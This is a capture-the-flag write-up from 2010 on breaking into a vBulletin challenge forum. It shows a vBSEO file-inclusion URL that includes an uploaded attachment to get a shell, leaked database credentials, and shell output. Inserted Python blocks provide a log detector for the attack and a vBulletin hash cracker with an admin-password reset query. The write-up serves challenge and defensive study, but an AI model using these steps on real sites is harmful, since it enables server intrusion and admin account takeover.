~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#########################################################################
#   ______      _ _                                                     #
#  |  ____|    (_) |                         Report HaXx.Me #01         #
#  | |__ __   _ _| |_______  _ __   ___                                 #
#  |  __\ \ / / | |_  / _ \| '_ \ / _ \      2010 ande@evilzone.org     #
#  | |___\ V /| | |/ / (_) | | | |  __/                                 #
#  |______\_/ |_|_/___\___/|_| |_|\___|.org                             #
#                                                                       #
#                                                                       #
#  -=Information=-                                                      #
#                                                                       #
#  Date:         02.08.2010                                             #
#  Reporting:    HaXx.Me #01                                            #
#  Reported by:  ande, IFailStuff                                       #
#  Contact:      ande@evilzone.org | IFailStuff@evilzone.org            #
#                                                                       #
#########################################################################
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

-=First there was nothing=-

Alright, so. Two days ago IFailStuff informed me of a hacker challenge at intern0t. At first I thought it was another easy little challenge, but it turned out to be a little harder than expected. Now that it's done, I realize it was pretty simple. Either way, it was an interesting and fun experience.

We started, me and IFailStuff, by looking for simple things like version information and so on. IFailStuff figured out early that there was an LFI vulnerability in the vBSEO version running on hax0r.intern0t.net. However, as with any LFI, you need something useful to include in order to gain any kind of access. This turned out to be a pain in the ass. As anyone would do, you turn to looking for upload possibilities. When that doesn't work, you gotta be a little more creative. However, a quick look at the vbseo.php source made me realize that being creative here was gonna be hard. So instead of working further on the LFI, we concluded that this could not be it; there had to be some other way to gain access. After another day of fooling around on the site, we turned our attention back to the LFI and got somewhat further with it. But still no cigar. One day later...

-=, then it exploded=-

On the third day we finally succeeded.
Silly mistake on our part, not giving the LFI the attention it deserved. Once the "Hint: The opposite of upload may be a part of the answer you're seeking." was released on Twitter, we quickly figured out there was a folder called "download", and we confirmed its existence because it 403'd, meaning it is a real directory and not a rewrite. We didn't really find anything interesting at first, but after breakfast on my part the "Major hint: The real attachment directory is "download". Figure out how to find stored attachments. (filename: *.attach where * is a number)" was released, and then it was a piece of cake. Bad job on our part researching how vBulletin attachments are stored; we should have seen that earlier. Nonetheless, after some research on filenames and directory placement we figured the syntax was something like this:

/download/User-ID/attachment number.attach

A quick bruteforce on /download/2/0-20.attach confirmed this. Now we had something useful to give the LFI! Moments later..

http://hax0r.intern0t.net/sup3rs3cr3t/vbseo.php?vbseoembedd=1&vbseourl=download/2/16.attach

Yahtzee! We got our shell up.

Now, the objective was to find some sort of code or key in a forum section that was off limits to normal users. Obviously, we needed an admin account. There was a recently released bug/exploit in faq.php that would show anyone the database connection information. This was exactly what we needed. Naturally we could have just read config.php from the shell, but this made it more exciting: double exploit! The exploit in faq.php is as simple as a search; all you need to do is search for "Database" and you'll get all the database information:

Database Name:     vbulletin
Database Host:     localhost
Database Port:     3306
Database Username: vbuser
Database Password: hax0r1tn0w

This made things quite easy. Shell -> MySQL manager -> Edit admin logins -> Profit? We tried to bruteforce the hash first, but that didn't go too well. So we changed the password to "avccc" with the salt "abc".
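Defender's view of the two steps above, as an added example that is not part of the original report: a small Python detector run over constructed Apache access-log lines (sample data, not intern0t logs; the vbseo.php request mirrors the URL quoted above, everything else, including the IP addresses, is made up) that flags the two signals this attack leaves behind. First, a burst of 403s on /download/<userid>/<n>.attach from one client, which is the attachment enumeration. Second, vbseo.php requests whose vbseourl parameter carries a traversal sequence, an absolute path, a null byte or an .attach file. The parameter is decoded twice so that percent-encoded and double-encoded traversal are both caught.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample in Apache combined log format. Not real intern0t logs:
# the vbseo.php line mirrors the URL quoted in the writeup, the rest is made up.
SAMPLE_LOG = r'''
203.0.113.7 - - [02/Aug/2010:16:58:01 +0000] "GET /sup3rs3cr3t/showthread.php?t=12 HTTP/1.1" 200 7180 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Aug/2010:16:58:10 +0000] "GET /sup3rs3cr3t/download/2/15.attach HTTP/1.1" 403 291 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Aug/2010:16:58:11 +0000] "GET /sup3rs3cr3t/download/2/16.attach HTTP/1.1" 403 291 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Aug/2010:16:59:42 +0000] "GET /sup3rs3cr3t/vbseo.php?vbseoembedd=1&vbseourl=download/2/16.attach HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Aug/2010:17:00:03 +0000] "GET /sup3rs3cr3t/vbseo.php?vbseoembedd=1&vbseourl=..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1" 200 1400 "-" "Mozilla/5.0"
198.51.100.9 - - [02/Aug/2010:17:01:00 +0000] "GET /sup3rs3cr3t/vbseo.php?vbseoembedd=1&vbseourl=forums/general/123-some-thread.html HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
'''

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# vBulletin stores uploads as <attachdir>/<userid>/<attachmentid>.attach
ATTACH_RE = re.compile(r'^(?:/[^/]+)*/download/(?P<uid>\d+)/(?P<num>\d+)\.attach$')


def parse_line(line):
    """Split one combined-format line into ip, timestamp, method, target, status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['status'] = int(rec['status'])
    return rec


def classify_vbseourl(value):
    """Reason string if a vbseourl value looks like file inclusion, else None.

    Decoded twice on purpose: %2F hides '../' from a filter that does not
    decode at all, %252F hides it from a filter that decodes exactly once.
    """
    decoded = unquote(unquote(value))
    segments = decoded.replace('\\', '/').split('/')
    if '..' in segments:
        return 'path traversal in vbseourl'
    if '\x00' in decoded:
        return 'null byte in vbseourl'
    if decoded.startswith('/') or re.match(r'^[A-Za-z]:', decoded):
        return 'absolute path in vbseourl'
    if decoded.lower().endswith('.attach') or '/download/' in '/' + decoded:
        return 'attachment file included via vbseourl'
    return None


def detect(log_text, probe_threshold=2):
    """Return (ip, reason, evidence) triples for the attack pattern in the writeup."""
    findings = []
    attach_403s = defaultdict(int)  # per-client count of denied *.attach fetches
    for raw in log_text.strip().splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        url = urlsplit(rec['target'])
        # Signal 1: the attacker probing /download/<uid>/<n>.attach directly.
        if rec['status'] == 403 and ATTACH_RE.match(url.path):
            attach_403s[rec['ip']] += 1
            if attach_403s[rec['ip']] == probe_threshold:
                findings.append((rec['ip'],
                                 'attachment enumeration (repeated 403 on *.attach)',
                                 url.path))
        # Signal 2: the include itself, through the vbseourl parameter.
        if url.path.endswith('/vbseo.php'):
            for value in parse_qs(url.query, keep_blank_values=True).get('vbseourl', []):
                reason = classify_vbseourl(value)
                if reason:
                    findings.append((rec['ip'], reason, value))
    return findings


if __name__ == '__main__':
    for ip, reason, evidence in detect(SAMPLE_LOG):
        print(f'{ip}: {reason}: {evidence}')
```

On the sample the benign vBSEO rewrite from the second client produces nothing, while the first client trips all three rules. Correlating the 403 burst with the later include from the same address is what turns two weak signals into one strong alert.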
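The hash behind that password change, as an added example that is not the authors' own PHP script (their script is not reproduced on the page): vBulletin 3.x stores md5(md5(password) . salt) with a short random salt, so once you can write to the user table you pick a salt, compute the hash and UPDATE the row. The block also has the verifier side and a small wordlist attack, which shows why a bruteforce against the original hash can fail while a weak password with a known salt falls immediately. The unprefixed table name `user`, the administrator's userid 1 and the word list are assumptions.

```python
import hashlib
import hmac
from typing import Iterable, Optional


def md5_hex(data: str) -> str:
    """Lower-case hex MD5 of a UTF-8 string, the primitive vBulletin 3 builds on."""
    return hashlib.md5(data.encode("utf-8")).hexdigest()


def vb3_hash(password: str, salt: str) -> str:
    """vBulletin 3.x stored password: md5(md5(password) . salt).

    The inner md5 is what the login form's JavaScript sends to the server
    (the md5_hash field); the server appends the user's stored salt and
    hashes once more before comparing against the user table.
    """
    return md5_hex(md5_hex(password) + salt)


def vb3_verify(password: str, salt: str, stored: str) -> bool:
    """Constant-time comparison of a candidate password against the stored hash."""
    return hmac.compare_digest(vb3_hash(password, salt), stored.lower())


def crack(stored: str, salt: str, wordlist: Iterable[str]) -> Optional[str]:
    """Try each candidate with the known per-user salt; return the match or None.

    The salt defeats precomputed tables but not a direct dictionary run: two
    MD5 computations per candidate, so only the password's strength matters.
    """
    for candidate in wordlist:
        if vb3_verify(candidate, salt, stored):
            return candidate
    return None


def admin_reset_sql(userid: int, new_password: str, salt: str, table: str = "user") -> str:
    """Build the UPDATE that the 'edit admin logins' step in the writeup amounts to.

    Assumption: unprefixed vBulletin table `user`. Only alphanumeric salts are
    accepted by this string builder; real vBulletin salts may contain quotes
    and other punctuation, and those belong in a parameterised query, not in
    string interpolation.
    """
    if not salt.isalnum():
        raise ValueError("salt must be alphanumeric for this string builder")
    if not table.isidentifier():
        raise ValueError("bad table name")
    return (
        f"UPDATE {table} SET password = '{vb3_hash(new_password, salt)}', "
        f"salt = '{salt}' WHERE userid = {int(userid)};"
    )


if __name__ == "__main__":
    # Values from the writeup: new password "avccc", salt "abc". userid 1 is assumed.
    stored = vb3_hash("avccc", "abc")
    print("stored hash:", stored)
    print(admin_reset_sql(1, "avccc", "abc"))
    # Constructed mini word list: the weak password is found at once.
    print("cracked:", crack(stored, "abc", ["password", "123456", "avccc"]))
```

Reading the hash out of the database and running it through crack() with the user's salt is exactly what the bruteforce attempt described above does; it fails when the real password is not in the list, which is why rewriting the row was the shorter path.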
This was generated by a local PHP script, looking something like this:

Then it was just a matter of logging in and finding the code!

Thank you for logging in, Admin...

Aha! The Administration - This section is for the Administration only!

Then, our welcome post =)

"Dear contest participant,

The last step of this contest is to submit the code below via:
http://forum.intern0t.net/contactus.html

Where "Subject" should be changed to "Other" and you should write the following in the input field: "Challenge 01: Answer Code". In the message box you enter your nickname and the following code:

Best regards,
The Administration"

-=Further proof=-

Kernel: Linux li185-211 2.6.32.16-linode28 #1 SMP Sun Jul 25 21:32:42 UTC 2010 i686
Safe-Mode: OFF (not secure)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Disabled PHP Functions: NONE
cURL: OFF
Free 696.16 MB of 1.48 GB (46.02%)
Server IP: 178.79.129.211 - Your IP: xx.xx.xx.xx

/srv/www/li185-211.members.linode.com/public_html/sup3rs3cr3t/    drwxr-xr-x

[signaturepics]           DIR
[modcp]                   DIR
[install]                 DIR
[includes]                DIR
[images]                  DIR
[files]                   DIR
[download]                DIR
[customprofilepics]       DIR
[customgroupicons]        DIR
[customavatars]           DIR
[cpstyles]                DIR
[clientscript]            DIR
[archive]                 DIR
[admincp]                 DIR
visitormessage.php        26.72 KB
vbseocpform.php           104.55 KB
vbseocp.php               47.89 KB
vbseo.php                 52.05 KB
usernote.php              18.64 KB
usercp.php                33.69 KB
threadtag.php             12.11 KB
threadrate.php            8.47 KB
tags.php                  13.04 KB
subscription.php          32.09 KB
showthread.php            71.8 KB
showpost.php              12.09 KB
showgroups.php            9.82 KB
sendmessage.php           20.44 KB
search.php                121.79 KB
reputation.php            13.38 KB
report.php                5.54 KB
register.php              38.81 KB
profile.php               148.74 KB
private.php               69.01 KB
printthread.php           6.42 KB
postings.php              72.61 KB
posthistory.php           9.28 KB
poll.php                  26.76 KB
picturecomment.php        24.7 KB
picture_inlinemod.php     21.51 KB
picture.php               7.69 KB
payments.php              11.62 KB
payment_gateway.php       7.55 KB
online.php                19.16 KB
newthread.php             18.45 KB
newreply.php              36.23 KB
newattachment.php         18.03 KB
moderator.php             6.58 KB
moderation.php            61.83 KB
misc.php                  23.29 KB
memberlist.php            35.09 KB
member_inlinemod.php      15.54 KB
member.php                16.65 KB
login.php                 9.97 KB
joinrequests.php          10.09 KB
inlinemod.php             178.82 KB
infraction.php            42.88 KB
index.php                 19.26 KB
image.php                 8.82 KB
groupsubscription.php     10.56 KB
group_inlinemod.php       24.32 KB
group.php                 134.95 KB
global.php                38.88 KB
forumdisplay.php          35.15 KB
favicon.ico               9.9 KB
faq.php                   9.54 KB
external.php              28.79 KB
editpost.php              46.63 KB
cron.php                  3.23 KB
converse.php              14.99 KB
clear.gif                 43 B
calendar.php              73.55 KB
attachment.php            17.87 KB
announcement.php          16.73 KB
album.php                 73.73 KB
ajax.php                  23.27 KB
LICENSE                   17.44 KB
.htaccess                 1.08 KB

-=Finally=-

Further questions: ande@evilzone.org or IFailStuff@evilzone.org

Shouts to all Evilzone and Intern0t members =)

#########################################################################
WWW.Evilzone.org ~ 2010

Screenshots:
http://evilzone.org/intern0t/2010-08-02_175328_watermarked.png
http://evilzone.org/intern0t/2010-08-02_175121_watermarked.png
http://evilzone.org/intern0t/2010-08-02_175032_watermarked.png
http://evilzone.org/intern0t/2010-08-02_175023_watermarked.png
http://evilzone.org/intern0t/2010-08-02_170303_watermarked.png
http://evilzone.org/intern0t/2010-08-02_170236_watermarked.png